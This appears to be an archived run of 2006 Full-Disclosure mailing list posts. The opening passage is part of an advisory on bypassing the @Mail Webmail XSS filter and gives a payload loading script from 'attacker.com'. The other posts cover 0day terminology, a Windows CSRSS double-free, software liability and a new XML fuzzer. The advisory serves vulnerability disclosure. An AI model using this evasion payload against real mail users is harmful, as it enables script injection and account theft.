s/On(Abort|Blur|Change|Click|DblClick|DragDrop|Error|Focus|KeyDown|KeyPress|KeyUp|
Load|MouseDown|MouseMove|MouseOut|MouseOver|MouseUp|Move|Reset|Resize|Select|Submit|
Unload)/DEFANGED_On$1/gi;
}if (/[\047][^\047\s]*#x?[1-9][0-9a-f]/i) {while (
/[\047][^\047\s]*#((4[6-9]|5[0-8]|6[4-9]|[78][0-9]|9[07-9]|1[0-1][0-9]|12[0-2]))/
)
{$I1I111III1II = chr($1);s/#$1;?/$I1I111III1II/g;
}while (
/[\047][^\047\s]*#(x(2[ef]|3[0-9a]|4[0-9a-f]|5[0-9a]|6[1-9a-f]|7[0-9a]))/i
)
{$I1I111III1II = chr( hex(0$1) );s/#$1;?/$I1I111III1II/gi;
- ---8--- SNIP Global.pm line 626 - 635 SNIP ---8---

The above code will replace SCRIPT with DEFANGED_SCRIPT, but the
security created by the filtering process can be defeated. This is
because most web browsers assume that non-alpha-non-digit characters
are invalid after an HTML keyword and as such they are treated as
white-space. An attacker can use this knowledge to attack @Mail users.

Example:

\s matches any white space character (space and tab, as
well as \n and \r characters). SCRIPT is defanged by the
above sanitization however SCRIPT/XSS is not.

When SCRIPT/XSS hits a web browser it is translated back into
SCRIPT and executed by the browser. the /XSS becomes whitespace
to the browser. This is a very common filter evasion technique.


The following code SCRIPT/XSS src=//attacker.com/xss.js/SCRIPT
will then be executed when rendering an email with @Mail Webmail.

Please note that the email parser will also replace http:// by a a
href=..., breaking up our XSS 

Re: [Full-disclosure] [fuzzing] NOT a 0day! Re: OWASP Fuzzing page

2006-12-21 Thread Jerome Athias
Gadi Evron a écrit :
 On Tue, 12 Dec 2006, Joxean Koret wrote:
   
 Wow! That's fun! The so called Word 0 day flaw also affects
 OpenOffice.org! At least, 1.1.3. And, oh! Abiword does something cool
 with the file:
 

 This is NOT a 0day. It is a disclosed vulnerability in full-disclosure
 mode, on a mailing list (fuzzing mailing list).

 I am not sure why I got this 10 times now, I thought the days of these
 bounces were over. But I am tired of seeing every full-disclosure
 vulnerability called a 0day anymore.

 A 0day, whatever definition you use, is used in the wild before people are
 aware of it.
It makes sense and I totally agree with you.
But the fact is that the things change (and not allways in the right 
direction :-()... due to the society, money, research of popularity...
Please remember us also the sense of the word hacker for instance, 
since nowadays it's often use to speak about bad guy/blackhat/pirate - 
i hope you'll agree that it's not the (our) sense

/JA

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Fun with event logs (semi-offtopic)

2006-12-21 Thread Michele Cicciotti
 Yes,  probably  this  bug  only  affects  event  viewer  itself. I don't
 understand  how  and why Microsoft achieved this effect in event viewer,
 which  is,  by  the  way,  security tool, and if it's hard for different
 vendor  to  make  same  mistake.

For what it's worth, the updated viewer in Windows Vista can show string 
inserts separately, in a list. IIRC its XML export function exports them 
separately, too


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Microsoft Windows XP/2003/Vista memory corruption 0day

2006-12-21 Thread Alexander Sotirov
3APA3A wrote:
 Killer{R}  assumes  the problem is in strcpy(), because it should not be
 used for overlapping buffers, but at least ANSI implementation of strcpy
 from  Visual  C  should be safe in this very situation (copying to lower
 addresses).  May be code is different for Windows XP or vulnerability is
 later in code.

We discovered this bug some time ago and were preparing an advisory when it was
publicly disclosed. Since the exploit is already public, here's my analysis of
the vulnerability:

http://www.determina.com/security.research/vulnerabilities/csrss-harderror.html

It's a double free bug that leads to arbitrary code execution in the CSRSS 
process.

Alex

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] [WEB SECURITY] comparing information security to other industries

2006-12-21 Thread Nick FitzGerald
Jason Muskat, GCFA, GCUX, de VE3TSJ wrote:

 People, programmers, computers, software, design patterns, systems, and
 infrastructure are constantly changing, often being reinvented. As such,
 will never be stable.
 
 Concrete of a type is always the same and therefore predictable. One can
 state with certainly that a concrete slab will perform to design. This will
 ever be possible in IT.
 
 Many commercially produced software products don¹t have any warranty. Many
 even state that the software is not warranted for any function or purpose.

That's _because_ software makers argued long and hard for a special 
exemption from most standard producer liability regulations and laws, 
and in many cases also for protection from consumer protection laws.

They made this argument mainly along the lines you opened your comments 
with -- everything is so complex and forever changing that if we had 
to do proper design, specification and testing we'd never produce 
anything and meeting those normal legal requirements would make 
everything ever so much less innovative and slower and only the very 
largest companies could ever afford to even think about writing 
software.

This -- particularly the cost will bury us part -- is _still_ the 
main argument the OSS folk make against any and all suggestions that 
software liability rules should be tightened up.

Thus, as NOT providing such guarantees is legally sanctioned, you 
cannot really use it as an argument supporting the any old slop we put 
on the disk will do approach we have sufferred from for far too long.

 ... The fact that the software does something that one thinks it should do
 is incidental. 

Yep.

Given you seem so strongly in favour of the current couldn't really 
give a shit view of software quality, you'll be rushing to sign my 
petition requiriung all university and other educational courses in 
computer science to change their names to computer art  craft or 
computer guesswork or something similarly accurately describing their 
professional endorsement of hit-and-miss, slop it all in a bucket then 
pour it through a compiler we especially dumbed down to not give a rats 
arse about quality approach, and for software engineering courses to 
similarly remove their abuse use of the term engineering...


Regards,

Nick FitzGerald

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Microsoft Windows XP/2003/Vista memory corruption 0day

2006-12-21 Thread Pukhraj Singh
Holy mackerel! Instances of this bug date back to 1999!

http://groups.google.ca/group/microsoft.public.win32.programmer.kernel/browse_thread/thread/c5946bf40f227058/7bd7b5d66a4e5aff

--Pukhraj

On 12/21/06, Alexander Sotirov [EMAIL PROTECTED] wrote:
 3APA3A wrote:
  Killer{R}  assumes  the problem is in strcpy(), because it should not be
  used for overlapping buffers, but at least ANSI implementation of strcpy
  from  Visual  C  should be safe in this very situation (copying to lower
  addresses).  May be code is different for Windows XP or vulnerability is
  later in code.

 We discovered this bug some time ago and were preparing an advisory when it 
 was
 publicly disclosed. Since the exploit is already public, here's my analysis of
 the vulnerability:

 http://www.determina.com/security.research/vulnerabilities/csrss-harderror.html

 It's a double free bug that leads to arbitrary code execution in the CSRSS 
 process.

 Alex

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Windows is very holy

2006-12-21 Thread Valdis . Kletnieks
On Thu, 21 Dec 2006 23:15:41 GMT, Aaron Gray said:

 Sorry a dog not lions !

Of course, even the most bad-ass canine can be taken down by sufficient
strength:

Herakles asked Pouton [Haides] for Kerberos, and was told to take the hound if
he could overpower it without using any of the weapons he had brought with him.
He found Kerberos at the gates of Akheron, and there, pressed inside his armour
and totally covered by the lion's skin, he threw his arms round its head and
hung on, despite bites from the serpent-tail, until he convinced the beast with
his choke-hold. Then, with it in tow, he made his ascent through Troizen. After
showing Kerberos to Eurystheus, he took it back to Haides' realm. -
Apollodorus, The Library 2.125

or cleverness:

Huge Cerberus, monstrously couched in a cave confronting them, made the whole
region echo with this three-throated barking. The Sibyl, seeing the snakes
bristling upon his neck now, threw him for bait a cake for honey and wheat
infused with sedative drugs. The creature, crazy with hunger, opened its three
mouths, gobbled the bait; then its huge body relaxed and lay, sprawled out on
the ground, the whole length of its cave kennel. Aeneas, passing its entrance,
the watch-dog neutralize, strode rapidly from the bank of that river [Styx] of
no return. - Virgil, Aeneid 6.417

http://www.theoi.com/Ther/KuonKerberos.html

There's a security-related moral somewhere in there. :)


pgpjKpSSTdvW2.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Microsoft Windows XP/2003/Vista memory corruption 0day

2006-12-21 Thread Michele Cicciotti
 Holy mackerel! Instances of this bug date back to 1999!

Different bug. That appears to be a trivial exhaustion of CSRSS worker threads 
through indiscriminate calls to MessageBox+MB_SERVICE_NOTIFICATION, which 
causes a DoS as no threads are available to serve kernel-mode requests from 
win32k, stalling GUI processes. I have done my fair share of CSRSS reversing in 
my better days, and I'm pretty sure that in Windows 2000 and later, a dedicated 
thread is used for such notifications, not just any thread, any time. Easily 
verifiable with local net sends and Spy++. It wasn't a bug either, more like 
a serious design flaw that ignored a very basic Win32 mantra (don't do GUI in 
a worker thread) - not at all like this double-free


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Windows is very holy

2006-12-21 Thread Jim Popovitch
On Thu, 2006-12-21 at 02:28 +, Aaron Gray wrote:
 Windows is very very holy.

Don't you mean hole'y?  ;-)

-Jim P.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Windows is very holy

2006-12-21 Thread Jim Popovitch
On Thu, 2006-12-21 at 20:37 -0500, Jim Popovitch wrote:
 On Thu, 2006-12-21 at 02:28 +, Aaron Gray wrote:
  Windows is very very holy.
 
 Don't you mean hole'y?  ;-)

OK, why do I get bounce messages from 

  [EMAIL PROTECTED] (sub: Posting error: Secure Computing)

  [EMAIL PROTECTED] (sub: Blogger post failed)

Seems to me that if you are smart enough to fwd email to a third place,
you would be smart enough to have it accept from everyone (not just
yourself).

-Jim P.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [TOOL] untidy - XML Fuzzer

2006-12-21 Thread Andres Riancho
List,

   I'm glad to release a beta version of untidy; untidy is general
purpose XML Fuzzer. It takes a string representation of a XML as input
and generates a set of modified, potentially invalid, XMLs based on
the input. It's released under GPL v2 and written in python.

   http://untidy.sourceforge.net/

Cheers,

-- 
Andres Riancho

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Windows is very holy

2006-12-21 Thread Michele Cicciotti
  Windows is very very holy.
 Don't you mean hole'y?  ;-)

Time for a gratuitous Sluggy Freelance reference!

http://sluggy.com/daily.php?date=040208

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/